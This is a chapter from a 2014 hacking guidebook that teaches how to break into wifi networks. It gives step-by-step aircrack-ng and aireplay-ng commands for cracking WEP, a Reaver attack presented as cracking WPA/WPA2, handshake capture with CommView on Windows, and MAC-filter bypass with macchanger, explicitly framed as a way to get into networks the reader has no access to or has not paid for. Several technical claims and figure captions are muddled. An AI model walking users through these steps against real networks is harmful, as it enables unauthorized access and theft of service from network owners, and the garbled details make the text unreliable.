Wireless hack - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 8. Wireless hack

We will cover:

* How security wifi is encrypted

* Tools to crack a wifi

* Cracking WEP wireless password

* Cracking WPA/WPA2 wireless password

* Cracking wifi password in windows

* Bypassing MAC Address filter

Sometimes you might end up with many wireless connection having no access to them because they are encrypted with password protection now this can be a pain in the ass. In this chapter, I’ll teach you on how to find the wifi password with no hard work.

How security wifi is encrypted

WI-FI had many encrypted technologies. The first encryption WEP was easy to get hacked into. But then later came the WPA and the WPA2.

WEP(Wired Equivalent Privacy)

This is the encryption that is used mostly in all countries over the world in these past years. But it turned out that the WEP encryption was really vulnerable and was cracked using free software’s. In 2004 WI-FI alliance retired WEP.

WPA(Wi-Fi Protected Access)

WPA was a complete replacement over the WEP. What was new in this encryption, was the message integrity checks. What this does, it determines if an attacker had captured between the access point. And, the strong configuration was later superseded by Advanced Encryption Standard (AES).But soon after that WPA also turned out to a vulnerable protection.

WPA2(Wi-Fi Protected Access 2)

Because WPA turned out to be vulnerable after all , WPA2 came in with CCMP. This encryption is almost impossible to crack into. But if you really want to break inside the WPA2 all it takes it’s the same technique used for the one of WPA. Which could take from two to fourteen hours.

Tools to crack a wifi

There are various tools out there to help with wifi hacking but today I’ll show you the most popular ones commonly used every day in every single moment in the hacking life.

The tools

* Backtrack

* Airmon-ng

*Commview

*Compatible wifi card

The biggest requirement that you’ll need is a good wireless adapter or else your done for. It has to be a good adapter that receives packages real fluently. Here below I will show you the adapters I found useful to be good for this exercise.

Cracking WEP wireless password

In this exercise we will start first with WEP encryption hacking.

1. First run backtrack to desktop and open the terminal.

2. To get a list of the network interfaces type in(see Figure 8-1):

airmon-ng

In Figure 8-1 .With this you can see all the wireless interface listed

3. Here you can I see I have a wlan0

4. Next step would be to do the airmon-ng start (interface) so I would type:

airmon-ng start wlan0

5. Now to find the networks in area and pick it we will be using airodump-ng (interface) . So I type :

airodump-ng mon0

6. Hit Ctrl+c to stop the list when you found your desired wifi you want to hack.(see Figure 8-2)

In Figure 8-2 .Here I have all the wifi listed in the area.

7. Now we are going to see what’s going on in that network, and capture packets from it to a file using airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface) so in my case I type in:

airodump-ng –c 6 –w darkknight --bssid 00:05:5D:EC:AA:52 mon0

8. Now leave that terminal open and run another terminal and we will use this command aireplay-ng -1 0 -a (bssid) mon0

So I type in:

aireplay-ng -1 0 -a 00:05:5D:EC:AA:52 mon0

9. Now this time we will start getting the mass packets that we needed by using aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b (bssid) mon0 . So I will type in:

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b 00:05:5D:EC:AA:52 mon0

Choose “y” for yes. And with that backtrack will start collecting mass and mass of packets this time, leave it working for some while.

10. Once you think you got enough packets maybe after 5 to 6 hours or even more open the third terminal and I would type:

Aircrack-ng wep*.cap

And there it should display the found password.(see Figure 8-3)

In Figure 8-3 .In here you can see the password that I found of my own wifi during the test

Cracking WPA/WPA2 Wireless Pass

In this exercise we will continue with WPA/WPA2 password to hack into WPA/WPA2 encryption.

1. Open backtrack to the deskop and run two terminals

2. In the 1st terminal type in:

airmon-ng

And the interface will come up.

3. So type in :

airmon-ng start wlan0

4. airodump-ng mon0 to see the network I will use the dlink because its mine. (see Figure 8-4)

In Figure 8-4 .Here its scanning the wifi in the Area just like before.

Press ctrl+c to stop the process when you see the network you want use.

5. And now go to the second terminal and install reaver . First we will get a update so we type in :

apt-get update

6. And now we install reaver by typing :

Apt-get install reaver

7. And now we type in to start using reaver:

Reaver –i mon0 –b 70:19:70:5A:63:26 –vv

8. And now let it run it could take 2 to 10 hours and after that when it get cracked you’ll get this (see Figure 8-5) And we found the password in WPA PSK: “nnoosecretts”

In Figure 8-5 .After a while of scanning here it found the password I was looking for.

Crack Wi-Fi passwords in Windows

Lunix is not the only operating system that is able to hack wireless passwords. Windows also uses aircrack-ng to accomplish wifi password hacking. Some people find it easier to use windows because of the graphical user interface so I made an exercise that teaches it.

1. First download commview for free trial version at http://www.tamos.com/download/main/ca.php

It can also be bought at from site itself. This is a tool for monitor wireless.

2. Once it’s done , lunch commview(see Figure 8-5) and go in the note Tab

In Figure 8-5 .shows you Commview opened ready to start doing some sniffing.

3. Click the blue start button this will open the scanner dialog and in there click the “Start Scanning”

4. Let is scan until you find the network you want to attack. And, if still you can’t find the network you may want to change the channel(see Figure 8-6)

. And when you found it, stop the scanning and click on capture.

W

In Figure 8-6 .There are the wifi’s in the area being scanned

5. WPA hacking is deferent from WEP hacking. WPA a handshake needs to be captured with that being sad I recommend to leave the scanner running to increase the chance for capturing a handshake.

6. When you think you have enough, stop the capturing, go to the Logging tab and click on Concatenate Logs and save it with any file name on the Desktop. (see Figure 8-7)

W

In Figure 8-7 .Here are how your settings needs to look like when you’re about to save your log file

7. Now go to File->Log Viewer . And once the Dialog opens go to File->Load CommView Logs.. And from there load the file you just saved.

8. And go to File->Export Logs->Wireshark/Tcpdump Format… And give it a name and save.

9. Now we go to www.aircrack-ng.org/install.html and click on “Pre-compiled” and from there download Aircrack-ng GUI.exe(see Figure 8-8)

In Figure 8-8 .This is the Aircrack-ng GUI running ready to crack the file

10.Change the encryption to WPA and click Choose in the Wordlist, browse where you want to save the password list in a text file. For example “password list.txt” . Then click Launch

11. This will open command prompt with all the network listed in and in the encryption you will see if it has handshake or not. (see Figure 8-9)

In Figure 8-9 .Here is how it looks like when you have to select the mac address of the wifi you hacked

Choose the number of Index and target the network in my case I choosed: 5

12.And Aircrark will start on searching the possible passwords and then when it finds the password it will stop running and give you the key found. (see Figure 8-10)

In Figure 8-10.Here is how it looks like when it did found the password

And thats how you find a wi-fi password in windows. Fairly easy just by using Graphical User Interface.

Bypassing MAC Address filters

Sometimes you might have the password for the wifi in the area. But you’re not in the mac address list. For example you might have to pay the front desk to get a complete access to the wifi to gain internet. Here I will show you how to bypass the mac address filter.

1. Run backtrack to the desktop run the terminal

2. Now type :

airmon-ng start wlan0

airodump-ng mon0

3. Copy the BSSID of the network we want to hack mine is: 98:FC:11:69:E6:07

4. Now we will search some packets from the wifi. We will use airodump-ng –c [channel] –a --bssid [bssid] mon0. That means I would type:

airodump-ng –c 9 –a --bssid 98:FC:11:69:E6:07 mon0

5. Now we wait for the terminal to work until we get some packets under the STATION (see Figure 8-11)

In Figure 8-11.Here is how it looks like when it did found the password.

6. Once you found the mac address under the station copy it. Mine is 00:12:3E:78:3F:7F

7. Now we are taking the interface down by typing:

Ifconfig wlan0 down

Macchanger –m 00:12:3E:78:3F:7F wlan0

Ifconfig wlan0 up

8. Now lunch the wireless manager by going start->internet->Wicd Network Manager

9. Disconnect all, give it a refresh and connect to the wifi you by passed its filer and it should work

Sometimes if you by pass the mac filter you might lose the internet. It might be because they found out that you spoofed inside the network and they kicked you out.

Small summary ahead

*WEP encryption is the most vulnerable encryption for wifi.

*WPA2 encryption is the strongest encryption for wifi

Commview,Airmon-ng Compatible wifi are the requerments for wifi hacking.

*If the adapter is not strong enough you won’t be able to get enough packages to do the hacking

*Mac address filtering can be bypassed using backtrack